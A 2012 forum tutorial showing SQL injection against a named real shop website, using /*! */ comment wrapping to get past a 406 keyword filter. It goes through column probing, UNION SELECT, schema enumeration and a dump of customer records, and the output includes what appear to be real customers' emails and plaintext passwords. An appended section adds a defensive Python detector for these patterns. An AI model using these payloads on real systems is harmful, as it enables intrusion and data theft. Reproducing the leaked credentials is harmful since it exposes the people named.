22 Jun 2012
[Tut] Bypass 406 SQL for Newbie
Euro 2012 kicks off today, so I am taking the liberty of writing a tut on 406-type SQL for newbies; if you already know this, please don't flame me. Site:
Code:
http://www.jansancleaningsupplies.com/index.php?pid=47'
Code:
http://www.jansancleaningsupplies.com/index.php?pid=47 order by 1
+
Code:
http://www.jansancleaningsupplies.com/index.php?pid=47 order by 2
+
Code:
http://www.jansancleaningsupplies.com/index.php?pid=-47 UNION SELECT 1-- -
Not Acceptable
An appropriate representation of the requested resource /index.php could not be found on this server.
Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.
Code:
http://www.jansancleaningsupplies.com/index.php?pid=-47 UNION /*!SELECT*/ 1-- -
+Get table:
Code:
http://www.jansancleaningsupplies.com/index.php?pid=-47 UNION /*!SELECT*/ 1 group_concat(table_name) from information_schema.tables where table_name=database()-- -
Not Acceptable
An appropriate representation of the requested resource /index.php could not be found on this server.
Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.
Code:
www.jansancleaningsupplies.com/index.php?pid=-47 UNION /*!SELECT*/ unhex(hex(group_concat(/*!table_name*/))) from information_schema./*!tables*/ where table_schema=database()-- -
articles,auth,categories,customers,manufacturers,orders,products,specialfiles
Code:
www.jansancleaningsupplies.com/index.php?pid=-47 UNION /*!SELECT*/ unhex(hex(group_concat(/*!column_name*/))) from information_schema./*!columns*/ where table_schema=database() and /*!table_name*/=0x637573746f6d657273-- -
id,email,password,passhash,joindate,firstname,mi,lastname,companyname,street1,
street2,city,state,zipcode,priphone,secphone,getemail,billme,shipping,orders
Code:
http://www.jansancleaningsupplies.com/index.php?pid=-47 UNION /*!SELECT*/ unhex(hex(group_concat(/*!id,0x7c,email,0x7c,password*/))) from customers-- -
4|dpdurrell@hotmail.com|preston59
3|josh@uppertech.net|eeq7322
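The 406 responses above come from a request filter that matches SQL keywords literally; the `/*!SELECT*/` form gets past it because MySQL executes the body of a `/*! ... */` comment as SQL. As an added example (not part of the original post), here is a log-review check that unwraps those comments before matching, run over constructed query strings; the function names, rule names and patterns are assumptions of this example.

```python
import re
from urllib.parse import unquote_plus

# MySQL runs the body of /*! ... */ (optionally /*!50000 ... */) as SQL,
# so a filter has to inspect the body instead of skipping it as a comment.
VERSIONED = re.compile(r"/\*!(?:\d{5,6})?(.*?)\*/", re.S)
PLAIN_COMMENT = re.compile(r"/\*.*?\*/", re.S)

# Assumed rule set for this example; tune it for the application being monitored.
RULES = {
    "union-select": re.compile(r"\bunion\b\s+(all\s+)?\bselect\b"),
    "schema-enum": re.compile(r"\binformation_schema\b"),
    "order-by-probe": re.compile(r"\border\s+by\s+\d+\b"),
}

def normalize(raw_query: str, unwrap: bool = True) -> str:
    """URL-decode a query string and flatten it the way MySQL would read it."""
    text = unquote_plus(raw_query)
    if unwrap:
        prev = None
        while prev != text:              # repeat to handle nested wrapping
            prev = text
            text = VERSIONED.sub(r" \1 ", text)
    text = PLAIN_COMMENT.sub(" ", text)  # remaining comments act as whitespace
    return re.sub(r"\s+", " ", text).lower().strip()

def match_rules(raw_query: str, unwrap: bool = True) -> list[str]:
    """Names of the rules that fire on the (optionally unwrapped) query."""
    text = normalize(raw_query, unwrap)
    return sorted(name for name, rx in RULES.items() if rx.search(text))

def missed_by_literal_filter(queries: list[str]) -> list[str]:
    """Queries where unwrapping /*! */ reveals hits a comment-stripping filter misses."""
    return [q for q in queries
            if set(match_rules(q)) - set(match_rules(q, unwrap=False))]

# Constructed sample query strings (no real host or log data).
SAMPLES = [
    "pid=47",
    "pid=47%20order%20by%202",
    "pid=-47+UNION+/*!SELECT*/+1--+-",
    "pid=-47 UNION /*!50000SELECT*/ x from information_schema./*!tables*/",
]

if __name__ == "__main__":
    for q in SAMPLES:
        print(f"{q!r}: literal={match_rules(q, unwrap=False)} unwrapped={match_rules(q)}")
```

A check like this only narrows log review; the injection itself goes away when `pid` is bound as a query parameter or cast to an integer before it reaches the SQL statement.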
